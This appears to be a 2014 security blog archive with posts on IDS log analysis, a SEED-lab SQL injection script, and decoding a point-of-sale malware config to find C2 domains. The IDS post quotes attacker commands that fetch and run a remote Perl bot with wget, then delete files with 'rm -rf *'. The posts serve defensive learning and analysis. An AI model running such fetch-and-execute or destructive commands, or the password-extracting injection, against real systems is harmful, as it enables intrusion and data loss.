Posts

Showing posts from April, 2014

US Cyber Challenge Scoreboard Analysis

Prior to the competition closing on April 31, 2014 for the latest US Cyber Challenge located at http://uscc.cyberquests.org I thought I would do a quick analysis on the users of those who appear on the scoreboards.

Looking at the number of times the same user appears:

AppearancesUser7jt6baldwintm6thepcnerd5devnull5jgbrigden5jimkoz235jmoore5linuz5ltomczak5mkaplan5sonken5webdevgirl5wiredaemon Only displaying the top 13 with 5 or more appearances on the scoreboards.

Another way to look at the numbers is below.  The number of appearances of the users that have appeared 7 times, 6 times, etc.

Number of UsersTotal Appearances1 7 times 2 6 times 10 5 times 15 4 times 25 3 times 100 2 times 909 1 time
I am a fan of the US Cyber Challenges and congratulate those who support it, fund it, and promote it.  Keep the challenges coming.

Examining IDS Logs for PHP-CGI Query String Vulnerabilities

Image
I noticed a few high severity events related to PHP-CGI Query String vulnerabilities going through the IDS and bouncing off of the webserver.

The first item was identifying it in the IDS as one of the below events:
ET Web_Specific_Apps PHP-CGI query string parameter vulnerability - CVE2012-1823

I am not necessarily going to focus on the exploit.  I want to focus on the information in the below screenshot:

As you can see part of the vulnerability is to execute the following commands through php:
cd /tmp - Change to the /tmp directory
wget http://www.macam-informasi.com/bibah/bot.txt - Download using wget the bot.txt
perl bot.txt  - Use perl and execute the text file bot.txt that was previously downloaded
rm -rf bot.txt - Remove the bot.txt if in the process of execution perl bot.txt terminates
rm -rf bot.txt* - Remove anything that starts with bot.txt possibly due to temporary files that are created
rm -rf *.txt - Remove any temporary *.txt files that were created
rm -rf * - Remove any files…

Python Raw Socket to Create ICMP Packet

Had a challenge to recreate a raw packet from bytes given in a text file.  Used python to create the raw socket.  The commented code is taking it from text to hex.

#!/usr/bin/env python

import socket
import struct

rawSocket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x800))
rawSocket.bind(("vmnet1", socket.htons(0x0800)))


#hexBytes = "000c29213dd1005056c00001080045000054b40a00004001905c0a0a112d0a0a11020000364e16070001c3190152013b030008090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637"

#counter = 1
#for letter in hexBytes:
#if counter == 1:
#firstLetter = letter
#counter = 2
#elif counter == 2:
#print "\\x" + firstLetter + letter
#counter = 1

hexPacket = "\x00\x0c\x29\x21\x3d\xd1\x00\x50\x56\xc0\x00\x01\x08\x00\x45\x00\x00\x54\xb4\x0a\x00\x00\x40\x01\x90\x5c\x0a\x0a\x11\x2d\x0a\x0a\x11\x02\x00\x00\x36\x4e\x16\x07\x00\x01\xc3\x19\x01\x52\x01\x3b\x03\x00\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x…

SQL Injection Script written for SEED Labs

SEED Labs are located here: http://www.cis.syr.edu/~wedu/seed/
These are great labs to learn more about cyber security and penetration testing.

The below script was developed to demonstrate SQL Injection on the phpBB lab that they provide.  Though the lab itself does not require this it was a great script to write.  With the script I extract the passwords for the 5 users that are found on the system.

This script could be made more efficient with instead brute forcing each letter to making them conditional statements.

#!/usr/bin/env python

import os
import re
from socket import *
from time import ctime

BUFSIZE=1024

# Change the hostInput based on your IP Address of the SEED Installation of Ubuntu 9.
hostInput = '172.16.108.140'

userNames = ['admin', 'alice', 'bob', 'carol', 'ted'] 
#userNames = ['ted'] 

userPassword = ''
contentLength = 63

for userName in userNames:
for number in range(1,30):
contentLengthTotal = contentLength + number

fo…

ASCII to Hex Encoder Another Version of a Previous Encoder

#!/bin/bash

# Usage: ./script-name <ASCII FILE> | tr -d '\n' > <ENCODED FILE>
# Take a file as the input

testInput=$1

function encode {

    case ${1} in
        "") echo "\x20" ;; "!") echo "\x21" ;; "\"") echo "\x22" ;;
        "#") echo "\x23"    ;; "$") echo "\x24" ;; "&") echo "\x26" ;;
        "%") echo "\x25"    ;; "'") echo "\x27" ;; "(") echo "\x28" ;;
        ")") echo "\x29" ;; '*') echo '\x2a' ;; '+') echo '\x2b' ;; 
        ',') echo '\x2c' ;; '-') echo '\x2d' ;; '.') echo '\x2e' ;; 
        "/") echo '\x2f' ;; '0') echo '\x30' ;; '1') echo '\x31' ;; 
        '2') echo '\x32' ;; '3') echo '\x33'…

Python - XOR a File

Origin of this script is from http://stackoverflow.com/questions/5037762/xor-each-byte-with-0x71

#!/usr/bin/python

file = bytearray(open("file.txt", "r").read())
for i in range(len(file)):
file[i] ^= 0x71

open("xorFile.txt", "wb").write(file)

Python Parser for CaptureBAT Output

From the command line where CaptureBAT is running I use the following syntax:
"CaptureBAT.exe -c -n -l outputCaptureBat.log"

Then copy the log file where the python script is located.

#!/usr/bin/python

import sys

def parseFile(file, filter, specific):
duplicate3rdItem=""
duplicate4thItem=""

for line in file:
items=line.split(',')
if items[1] == filter and items[2] == specific:
# Find the duplicates and remove them
if items[3] != duplicate3rdItem and items[4] != duplicate4thItem:
print items[0] + " " + items[3] + " " + items[4].rstrip()
duplicate3rdItem=items[3]
duplicate4thItem=items[4]


if len(sys.argv) >= 2:
outputFile='outputCaptureBat.log'
parseValues = [ ['"file"', '"Write"', 'Files Written'], ['"file"', '"Delete"', 'Files Deleted'],
       ['"process"', '"Created"', 'Processes Created'], ['"…

Python - base64 Decode and XOR brute force Config File Leading to C2 Server

This script is the same as the below one however it brute forces the XOR key that is used verses knowing that the XOR key is 0xe8.

#!/usr/bin/python

# Malware found on virus total
# Modified variant of the Project Hook point-of-sale malware
# Fetches an obfuscated file containing additional C&C domains:
# http://www.localhost0x2.net/config/config_01.bin
# File content is XOR'ed using 0xE8, then Base64 encoded.

# Original File Content - config_01.bin
# gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2c
# gJycmNLHx4Sdi4ORxYydhZibxoqBkg==

import base64

# Take the base64 given and decode it and add it to a list
base64info = "gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2cgJycmNLHx4Sdi4ORxYydhZibxoqBkg=="
decodedInfo = base64.b64decode(base64info)
infoDecoded = decodedInfo.encode("hex")

# Take the list and make the values of the list a hex number as a string
info = []
counter = 1
for letter in infoDecoded:
    if (counter == 1):
        listItem = '0x' + letter
        counter = 2
    elif (counter…

Python - base64 Decode and XOR with 0xe8 Config File Leading to C2 Server

#!/usr/bin/python

# Malware found on virus total
# Modified variant of the Project Hook point-of-sale malware
# Fetches an obfuscated file containing additional C&C domains:
# http://www.localhost0x2.net/config/config_01.bin
# File content is XOR'ed using 0xE8, then Base64 encoded.

# Original File Content - config_01.bin
# gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2c
# gJycmNLHx4Sdi4ORxYydhZibxoqBkg==

import base64

# Take the base64 given and decode it and add it to a list
base64info = "gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2cgJycmNLHx4Sdi4ORxYydhZibxoqBkg=="
decodedInfo = base64.b64decode(base64info)
infoDecoded = decodedInfo.encode("hex")

# Take the list and make the values of the list a hex number as a string
info = []
counter = 1
for letter in infoDecoded:
    if (counter == 1):
        listItem = '0x' + letter
        counter = 2
    elif (counter == 2):
        listItem = listItem + letter
        info.append(listItem)
        counter = 1


# Define the new list of where the hex w…

Rewrite of Unquoted Path Vulnerability Script

$hash = @{
"FullPath" = "ServiceValue"}
$hash.keys | % {
    $name = $hash.Item($_)
    if(Test-Path ("hklm:\SYSTEM\CurrentControlSet\Services\" + $name)){
        $info = (Get-ItemProperty ("hklm:\SYSTEM\CurrentControlSet\Services\" + $name) -Name ImagePath -EA "SilentlyContinue").ImagePath
        #Check for quotes
        if ($info -eq "`"$_`""){
            #For testing: Write-Host "Has quotes!" $name $info
        }
        #Check for no quotes
        elseif ($info -eq $_){
            Write-Host "NO QUOTES!" $info #For Testing
            Set-ItemProperty ("hklm:\SYSTEM\CurrentControlSet\Services\" + $name) -Name ImagePath -Value "`"$_`""
        }
    }
}